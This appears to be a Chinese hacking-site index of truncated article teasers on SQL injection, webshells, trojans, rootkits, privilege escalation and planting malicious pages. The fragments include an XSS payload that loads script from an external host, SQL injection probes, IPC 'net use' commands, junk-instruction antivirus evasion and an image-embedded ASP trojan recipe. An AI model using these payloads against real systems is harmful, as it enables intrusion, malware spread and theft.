大家在是否碰到过这样的站点： 全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担，提高访问速度。二来也阻止了SQL注入式的攻击。。 我来说说他们的文章系统原理：全部文章均 ...……

一、看见漏洞公告 　　最近想学习一下文件包含漏洞，在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的，PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞：include/inc_ext/spaw/dialogs/table.php 　　inc ...……

注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果. push ebp pop ebp push eax pop eax push esp pop esp push 0 push 0 push 10 -------其中数字可以任意,注意与下面对应 ...……

以前看过分析家写过一篇文章，介绍跨站脚本的安全隐患，当时只是知道有这样的 问题，也没有仔细阅读，目前此类问题经常在一些安全站点发布，偶刚好看到这样一篇文章 ， 抱着知道总比不知道好的想法，翻译整 ...……

一：检测一下网站的服务器是否开了 3389 远程终端 二：检测一下服务是否用了serv-u （还有是什么版本的） 方法 一：复制一个网站 用 3389 登陆器连接一下 （是否成功）能连接了，拿下服务器的机率，提高 30 ...……

在获得SA密码后，往往因为服务器管理者或前人将net.exe和net1.exe被限制使用，无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象，用来管理本地资源，利用它可以不依靠CMD等命令就能添加一个管理 ...……

鄙人今天心血来潮突然想写篇文章,鄙人从来没写过文章,如果有错误的地方请多多指教. 本文需要有基础的SQL语句知识才可以更好的理解.建议想学习的人多去了解一下SQL语句 和编程语言,知己知彼才能百战百胜. 我不 ...……

内网渗透的思想是源于特洛伊木马的思想---堡垒最容易从内部攻破，一个大型的网站，一个大型的公司，一个大型的目标，在外肉，管理员总会千方百计的加强防范和修补漏洞，常规的方法进去几乎是不可能。 内网渗透的 ...……

突然想我们是否可以用什么方法绕过SQL注入的限制呢？到网上考察了一下，提到的方法大多都是针对AND与号和=号过滤的突破，虽然有点进步的地方，但还是有一些关键字没有绕过，由于我不常入侵网站所以也不敢对上述过滤 ...……

一.测试环境： OS: Windowsxp sp2 php: php 4.3.10 ( mysql 4.1.9 apache 1.3.33 二.测试数据库结构： -----start--- -- 数据库: `test` -- -- ------------------------------------- ...……

最近有调查报告显示，知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%，而漏杀率却高达80%。那么是什么原因造成这种状况的？到底是如今的病毒过于厉害，还是杀毒软件的能力有限？今天我们就通过实例来看看是什么 ...……

Mysql BackDoor是一款针对PHP Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的state函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在 ...……

如何做一个后台DEAMON来控制安全访问？这就是贯穿这篇文章的中心概念。 我的控制访问比较特殊，考虑到远程登陆点并非固定，所以无法设定固定IP通过SSH登陆服务器。这样N多IP会通过黑客软件试图破解您的用户名和密 ...……

今天我来跟大家谈论一下关于QQ空间挂马的原理，我试了一下，成功率占80%。 有好多人都问我怎么样才可以做到肉鸡成群，我想了好久，觉得QQ空间挂马可以实现这个。所以我试做了一下， 竟然成功了！~~那我就想大家介 ...……

破 顾名思义就是暴力修改程序的代码来达到破解的目的 当然根据共享软件的注册方式我们可以对症下药 比如说没有注册的软件有功能限制、使用次数限制、使用日期限制等 我们就可以分别对待了！我们只需要解除这 ...……

Rootkit是一个或者多个用于隐藏、控制一台计算机的工具包，该技术被越来越多地应用于一些恶意软件中。在基于Windows的系统中Rootkit更多地用于隐藏程序或进程，系统被注入Rootkit后就可以在不为用户察觉的情况下进行 ...……

一、引言 随着计算机网络的不断发展，黑客技术也日益成为一支不可忽视的技术力量，尽管多数黑客的攻击目标以服务器为主，对大多数的互连网用户的直接危害并不大。但有一类称为特洛伊木马的黑客程序可以通过欺骗等 ...……

说到SQL注入机，从娃娃针对动网文章的dvTxt.pl到臭要饭的绝世猜解CSC、NB联盟的NBSI，大家也都用过吧？ 开天始祖 dvTxt.pl，也不知被改了多少遍，以用于针对各种不同的有SQL注入漏洞的系统，通常《黑防》的一篇《* ...……

net use $\ipipc$Content$nbsp; /user: 建立IPC空链接 net use $\ipipc$Content$nbsp;密码 /user:用户名 建立IPC非空链接 net use h: $\ipc$Content$nbsp;密码……

一．通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法：利用数据库备份得到WEBSHELL。创建一个表，在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来，最后再删除新建的表。 ...……

1.名称：如何制作图片ASP木马 （可显示图片） 建一个asp文件，内容为!--＃i nclude file=ating.jpg-- 找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为 了 ...……

大家可能都用过网页木马来下真正的EXE木马吧，但是有些时候 后门比较大下载的时候常常是网页暂停或是报错（CHM木马常遇到） 所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 ...……

作为脚本漏洞的头号杀手锏数据库下载漏洞，现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代，漏洞产生后随之而来的就是各种应对的招数，比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这 ...……

理论： Windows 程序中，在写图形用户界面时需要调用大量的标准 Windows Gui 函数。其实这对用户和程序员来说都有好处，对于用户，面对的是同一套标准的窗口，对这些窗口的操作都是一样的，所以使用不同的应用程序 ...……

网页挂马最难的就是传播了，小网站易入侵但是访问人数不多，收获的肉鸡也就不是很多。因此，一种新的挂马方式开始流行——局域网ARP欺骗挂马，只要局域网内一台机子中招了，它就可以在内网传播含有木马的网页，捕获 ...……

猜解表名： and exists (select * from 表名) 猜解列名： and exists (select 字段 from 表名) UNION法： 联合查询： select name,password,id from user union select user,pwd,uid from 爆指定表名内容： ...……

扫不出肉鸡有很多的可能!一般有如下的情况! 　　1.你系统的防火墙,或某些补丁作怪! 　　2.有些地方是扫不到肉鸡的(是不是和各地的电信有关,暂时还不知道) 　　3.机子设置有关! 　　4.扫描的网段没有肉鸡(空IPC的 ...……

当我们取得一个webshell时候，下一部要做的就是提升权限 　　个人总结如下： 　　1: C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 看能否跳转到这个目录，如果行那就最好了，直接下 ...……

dvbbs8.2漏洞补下载地址: http://bbs.dvbbs.net/dispbbs.asp?boardid=8;Id=1519564 紧急安全补丁0530 dvbbs8.2漏洞的产生 login.asp 这个文件的97行Function Dvbbs_ChkLogin 开始有以下代码： username=trim ...……

dbowner通过注射得到一个shell应该不是什么难事情了，比较麻烦的是就算利用增量备份，仍然有很多不确定的因素，如果之前别人有过什么错误的写入信息，可能备份出来得到的还是一些不能用的500错误，如何能够提高成功 ...……

“盗链”的定义是：此内容不在自己服务器上，而通过技术手段，绕过别人放广告有利益的最终页，直接在自己的有广告有利益的页面上向最终用户提供此内容。 常常是一些名不见经传的小网站来盗取一些有实力的大网站的地 ...……

随着恶意代码的发展越来越广泛，以及其强大的破坏性和更多样的传播方式，给人们带来更多的危害。叶子在前面的文章中已经跟大家谈过恶意代码的基本概念以及对其的研究分析流程。在本篇文章中叶子将给大家介绍一下恶意 ...……

基本知识 字节和字符的区别 Big Endian和Little Endian UCS-2和UCS-4 UTF-16和UTF-32 UTF-16 UTF-32 UTF-8 基本知识 介绍Unicode之前，首先要讲解一些基础知识。虽然跟Unicode没有直接的关系， ...……

一、综述 本文将引领读者打造一个初级的内核级Rootkit，然后为其引入两种简单的隐形技术：进程隐形技术和文件隐形技术。同时，为了让读者获得rootkit编程的相关经验，我们顺便介绍了rootkit的装载、卸载方法，以 ...……

家知道直接使用ASP是不能够重启服务器的，这时我们需要制作一个组件来实现功能，ASP通过这个组件调用系统API，然后按照不同的重启和关机方式进行操作！ 下面先说COM的制作，在VB中新建一工程，当然是Aceiv ...……

后门程序又称特洛伊木马，其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会感染其他电脑。 　　后门是一种登 ...……

定义： DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理：如果可以冒充域名服务器，然后把查询的IP地址设为攻击者的IP地址，这样的话，用户上网就只能看到攻击者的主页，而不是用户想要取得的网站的主页了， ...……

img src=javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}/img 字符过滤怎么办?用Encode加密后就无敌了~ 未加密前： img src='#' X ...……

近期发现adobe.com,internet.com,nike.com,等等著名站点都分分遭受到攻击，但攻击者所使用的技术并不是以往所使用的入侵WEB服务器，更改主页的惯用手法，攻击者使用的是一种域名劫持攻击？攻击者通过冒充原域名拥有 ...……

Oracle的销售在向客户兜售其数据库系统一直把它吹捧为牢不可破的，耍嘴皮子容易，兑现起来可就不那么容易了。不管什么计算机系统，人们总能够找到攻击它的方法，Oracle也不例外。本文将和大家从黑客的角度讨论黑客是 ...……